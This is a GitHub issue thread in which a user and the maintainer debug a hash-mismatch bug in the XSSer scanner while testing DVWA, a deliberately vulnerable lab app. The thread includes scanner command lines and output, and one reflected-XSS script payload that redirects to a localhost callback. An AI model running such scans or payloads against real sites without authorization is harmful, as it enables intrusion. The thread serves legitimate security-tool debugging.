Closed tolgahanakgun closed 5 years ago
epsylon
commented
5 years ago Hi @tolgahanakgun You are making 2 different (hashed) requests. 1) normal injection: xsser -u "http://10.0.2.5/vulnerabilities/xss_r/" -g "?name=XSS" 2) --hash Maybe you (or XSSer) are confusing that hashes? From README: --hash send a hash to check if target is repeating content
tolgahanakgun
commented
5 years ago Hi @epsylon,
I removed the --hash parameter from the command. So, my new command and output:
xsser -u "http://10.0.2.5/vulnerabilities/xss_r/" -g "?name=XSS" --cookie="PHPSESSID=5376nqb49o4itt41pglhef9hu2; security=low" --no-head -v --proxy http://127.0.0.1:8080
===========================================================================
XSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2016 - (GPLv3.0) -> by psy
===========================================================================
Testing [XSS from URL]...
===========================================================================
[-]Verbose: active
[-]Cookie: PHPSESSID=5376nqb49o4itt41pglhef9hu2; security=low
[-]HTTP User Agent: Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)
[-]HTTP Referer: None
[-]Extra HTTP Headers: None
[-]X-Forwarded-For: None
[-]X-Client-IP: None
[-]Authentication Type: None
[-]Authentication Credentials: None
[-]Proxy: http://127.0.0.1:8080
[-]Timeout: 30
[-]Delaying: 0 seconds
[-]Delaying: 0 seconds
[-]Retries: 1
===========================================================================
Target: http://10.0.2.5/vulnerabilities/xss_r/ --> 2019-07-09 01:04:11.633686
===========================================================================
---------------------------------------------
[-] Hashing: 1dc6ff3e68dc820e5a498a0ad7ce37b3
[+] Trying: http://10.0.2.5/vulnerabilities/xss_r/?name=">b874747b9fe042bd823584b61be2b8c2
[+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[-] Headers Results:
Date: Mon, 08 Jul 2019 21:20:45 GMT
Server: Apache/2.4.25 (Debian)
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
Content-Length: 4389
Connection: close
http-code: 200
total-time: 5.22345
namelookup-time: 2.5e-05
connect-time: 9.4e-05
header-size: 312
request-size: 428
response-code: 200
ssl-verifyresult: 0
content-type: text/html;charset=utf-8
cookielist: []
---------------------------------------------
[-] Injection Results:
[+] Checking: url attack with ">PAYLOAD... fail
Searching hash: 1dc6ff3e68dc820e5a498a0ad7ce37b3 in target source code...
Injection failed!
===========================================================================
Mosquito(es) landed!
===========================================================================
[*] Final Results:
===========================================================================
- Injections: 1
- Failed: 1
- Successful: 0
- Accur: 0 %
===========================================================================
[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)
===========================================================================
It sends request to http://10.0.2.5/vulnerabilities/xss_r/?name=">b874747b9fe042bd823584b61be2b8c2.
Consequently, it has to look for the ">b874747b9fe042bd823584b61be2b8c2 string in the response. However it does not. And also the payload string exists in the response as it is seen in the picture.
However, as it is seen in the output, Searching hash: 1dc6ff3e68dc820e5a498a0ad7ce37b3 in target source code..., the program looks for something different in the response.
epsylon
commented
5 years ago I see, @tolgahanakgun. It looks wrong... Can you try to use some transparent proxy (polipo, burp, etc..) or similar, so we can review deeply how the request is finally sent?.
tolgahanakgun
commented
5 years ago The screenshots in my previous message are taken from burpsuite. See --proxy http://127.0.0.1:8080 in the command. xsser -u "http://10.0.2.5/vulnerabilities/xss_r/" -g "?name=XSS" --cookie="PHPSESSID=5376nqb49o4itt41pglhef9hu2; security=low" --no-head -v --proxy http://127.0.0.1:8080 command sends only one GET request and the screenshot of the request in my previous message. In case of need, I am adding wireshark dump: https://file.io/EdNLnF
epsylon
commented
5 years ago Hi @tolgahanakgun, I will try to reproduce your error. I'll let you know as soon as I know something. Thank you very much for your time and for the report.
epsylon
commented
5 years ago Hi @tolgahanakgun I have found one detail on your issue. Are you using latest version for XSSer?. We are currently at: 1.7.2b and your output is for: 1.7.0b. Can you please try to repeat your test but using latest code. It is important, because some "hashing" related issues were fixed there.
tolgahanakgun
commented
5 years ago I pulled the latest version from github and used the executable file in the repository. However, the recently pulled application is in version 1.7b (XSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2018 - (GPLv3.0) -> by psy). And also, I reinstalled via the pulled repository, the result is the same. https://github.com/epsylon/xsser/blob/f5b07cb592a6e2146becf6f72ee11a4b7fcc9ec0/xsser/core/options.py#L35
epsylon
commented
5 years ago OK @tolgahanakgun I think that I have found the problem but I need you to test this other way at your DVWA app. Can you try to run it again but, without using 'XSS' keyword? I have tried it on my sandbox, like this: ./xsser -u "http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=" --no-head --cookie="PHPSESSID=5376nqb49o4itt41pglhef9hu2; security=low" -v Like this is "hashing" and also searching for same hash on target's source code, so working correctly. But, when using 'XSS' keyword directly inline on GET request, for example, and adding 'user_token' value, like this: http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=XSS&user_token=0b6bd529c5caf98a06212c74aab172ac# I can reproduce exactly your issue and hashes are unsync (btw, I need to do some other tests). Looks that something is wrong when updating variable: "url_orig_hash", so is an error coming for latest upgrade.
tolgahanakgun
commented
5 years ago Hi @epsylon ,
I have tested the URL without XSS keyword. When I omit the XSS from the URL, it does not sent any hash in the request.
└──╼ $xsser -u "http://dvwa.vul/vulnerabilities/xss_r/?name=" --no-head --cookie="PHPSESSID=pg4rhltiqlutv297o5a8shu2g6; security=low" -v --proxy http://127.0.0.1:8080
===========================================================================
XSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2018 - (GPLv3.0) -> by psy
===========================================================================
Testing [XSS from URL]...
===========================================================================
[-]Verbose: active
[-]Cookie: PHPSESSID=pg4rhltiqlutv297o5a8shu2g6; security=low
[-]HTTP User Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
[-]HTTP Referer: None
[-]Extra HTTP Headers: None
[-]X-Forwarded-For: None
[-]X-Client-IP: None
[-]Authentication Type: None
[-]Authentication Credentials: None
[-]Proxy: http://127.0.0.1:8080
[-]Timeout: 30
[-]Delaying: 0 seconds
[-]Delaying: 0 seconds
[-]Retries: 1
===========================================================================
Target: http://dvwa.vul/vulnerabilities/xss_r/?name= --> 2019-07-31 01:57:12.639389
===========================================================================
---------------------------------------------
[-] Hashing: bd52247acfd74cab52beb88041cea3de
[+] Trying: http://dvwa.vul/vulnerabilities/xss_r/?name=
[+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[-] Headers Results:
see row with ID 4, row with ID 3 belongs to URL with XSS keyword
See the line [+] Trying: http://dvwa.vul/vulnerabilities/xss_r/?name= in the console output, it does not send any hash in the request. Although it does not send any hash in the request, it searches a hash in the response.
epsylon
commented
5 years ago Roger @tolgahanakgun
epsylon
commented
5 years ago @tolgahanakgun ok!. I have found the error: It should works just removing/commenting these lines:
ventiska% ./xsser -u "http://127.0.0.1" -g "/DVWA/vulnerabilities/xss_r/?name=XSS" -v --ignore-proxy --cookie="security=low; PHPSESSID=ocjqm7d694dpd2i7jvm681vu77"
===========================================================================
XSSer v1.8.[1]: "The Hive!" - 2011/2019 - (GPLv3.0) -> by psy
===========================================================================
Testing [XSS from URL]...
===========================================================================
[-]Verbose: active
[-]Cookie: security=low; PHPSESSID=ocjqm7d694dpd2i7jvm681vu77
[-]HTTP User Agent: Mozilla/5.0 (X11; CrOS i686 12.433.109) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.93 Safari/534.30
[-]HTTP Referer: None
[-]Extra HTTP Headers: None
[-]X-Forwarded-For: None
[-]X-Client-IP: None
[-]Authentication Type: None
[-]Authentication Credentials: None
[-]Proxy: Ignoring system default HTTP proxy
[-]Timeout: 30
[-]Delaying: 0 seconds
[-]Delaying: 0 seconds
[-]Retries: 1
===========================================================================
Target: http://127.0.0.1 --> 2019-08-14 07:06:55.710293
===========================================================================
---------------------------------------------
[-] Hashing: 0096c4fd2ad71a4f4eb18aa81006989f
[+] Trying: http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=">0096c4fd2ad71a4f4eb18aa81006989f
[+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[-] Headers Results:
Date: Wed, 14 Aug 2019 05:06:55 GMT
Server: Apache/2.4.25 (Debian)
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 0
Vary: Accept-Encoding
Content-Length: 4395
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
http-code: 200
total-time: 0.001368
namelookup-time: 1.4e-05
connect-time: 5e-05
header-size: 349
request-size: 439
response-code: 200
ssl-verifyresult: 0
content-type: text/html;charset=utf-8
cookielist: []
---------------------------------------------
[-] Injection Results:
[+] Checking: url attack with ">PAYLOAD... ok
Searching hash: 0096c4fd2ad71a4f4eb18aa81006989f in target source code...
This injection is reflected by target so can be a vulnerability!! :)
Try --reverse-check connection to certify that is 100% vulnerable
===========================================================================
Mosquito(es) landed!
===========================================================================
[*] Final Results:
===========================================================================
- Injections: 1
- Failed: 0
- Successful: 1
- Accur: 100 %
===========================================================================
[*] List of possible XSS injections:
===========================================================================
[I] Target: http://127.0.0.1
[+] Injection: http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=%22%3E0096c4fd2ad71a4f4eb18aa81006989f
[-] Method: xss
[-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02] Forcing a reverse connection XSSer will certify that your target is 100% vulnerable
Connecting from: http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=XSS"><script>document.location=document.location.hash.substring(1)</script>#http://localhost:19084/success/4b1fd7cb2fa45754e60251646bddb5ef
http://127.0.0.1 is connecting remotely to XSSer... You have it! ;-)
==================================================
Mosquito(es) landed!
===========================================================================
[*] Final Results:
===========================================================================
- Injections: 1
- Failed: 0
- Successful: 1
- Accur: 100 %
===========================================================================
[*] List of possible XSS injections:
===========================================================================
[I] Target: http://127.0.0.1
[+] Injection: http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=%22%3E4b1fd7cb2fa45754e60251646bddb5ef
[-] Method: xss
[-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
./xsser -u "http://127.0.0.1" -g "/DVWA/vulnerabilities/xss_r/?name=XSS" -v --ignore-proxy --cookie="security=low; PHPSESSID=ocjqm7d694dpd2i7jvm681vu77" --auto
===========================================================================
Mosquito(es) landed!
===========================================================================
[*] Final Results:
===========================================================================
- Injections: 558
- Failed: 0
- Successful: 558
- Accur: 100 %The good news are that I gonna release a new code, soon... Mostly, because of you. So many thanks for that. :-D
epsylon
commented
5 years ago A new release: XSSer v1.8.1 "The Hive!" will be released soon...
epsylon
commented
5 years ago XSSer v.1.8.[1] - 'The Hive' released: https://github.com/epsylon/xsser/commit/808d1baebea2dac46818784bc9c9cd59cab55459
Hello,
I am trying to test a reflected XSS vulnerability in Damn vulnerable web application.
I use this command:
xsser -u "http://10.0.2.5/vulnerabilities/xss_r/" -g "?name=XSS" --cookie="PHPSESSID=5376nqb49o4itt41pglhef9hu2; security=low" --no-head --hash -v --proxy http://127.0.0.1:8080Afaik, the program sends a GET request to
http://10.0.2.5/vulnerabilities/xss_r/?name=2f797f2d18b337c71d5a736c7510f0d5and then searches for the2f797f2d18b337c71d5a736c7510f0d5hash in the response body to check whether the server repeats the hash.However, while checking the hash, the program checks a different hash from the previously sent hash in the GET request.
The program sent
2f797f2d18b337c71d5a736c7510f0d5hash but while checking the repetition in the response it is looking forc70c3b71646ad1a36305f04b91419ccbhash. I checked the request and the response with Burp and the2f797f2d18b337c71d5a736c7510f0d5hash was in the both request and response without any encoding.